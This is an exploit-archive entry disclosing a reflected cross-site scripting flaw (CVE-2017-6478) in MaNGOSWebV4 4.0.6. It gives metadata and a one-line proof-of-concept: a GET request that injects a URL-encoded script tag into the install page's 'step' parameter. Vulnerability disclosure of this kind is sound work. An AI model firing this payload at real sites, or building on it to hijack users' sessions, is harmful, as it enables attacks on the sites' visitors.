MaNGOSWebV4 4.0.6 - Reflected XSS

Author: CodeSecLab
type: webapps
platform: multiple
port: 
date_added: 2025-12-03 
date_updated: 2025-12-03 
verified: 0 
codes: CVE-2017-6478 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: MaNGOSWebV4  4.0.6 - Reflected XSS
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/paintballrefjosh/MaNGOSWebV4
# Software Link: https://github.com/paintballrefjosh/MaNGOSWebV4
# Version: 4.0.6
# Tested on: Ubuntu Windows
# CVE : CVE-2017-6478

PoC:
// Access the vulnerable URL and trigger the XSS payload
GET http://mangoswebv4/install/index.php?step=%3Cscript%3Ealert(1)%3C/script%3E


[Replace Your Domain Name]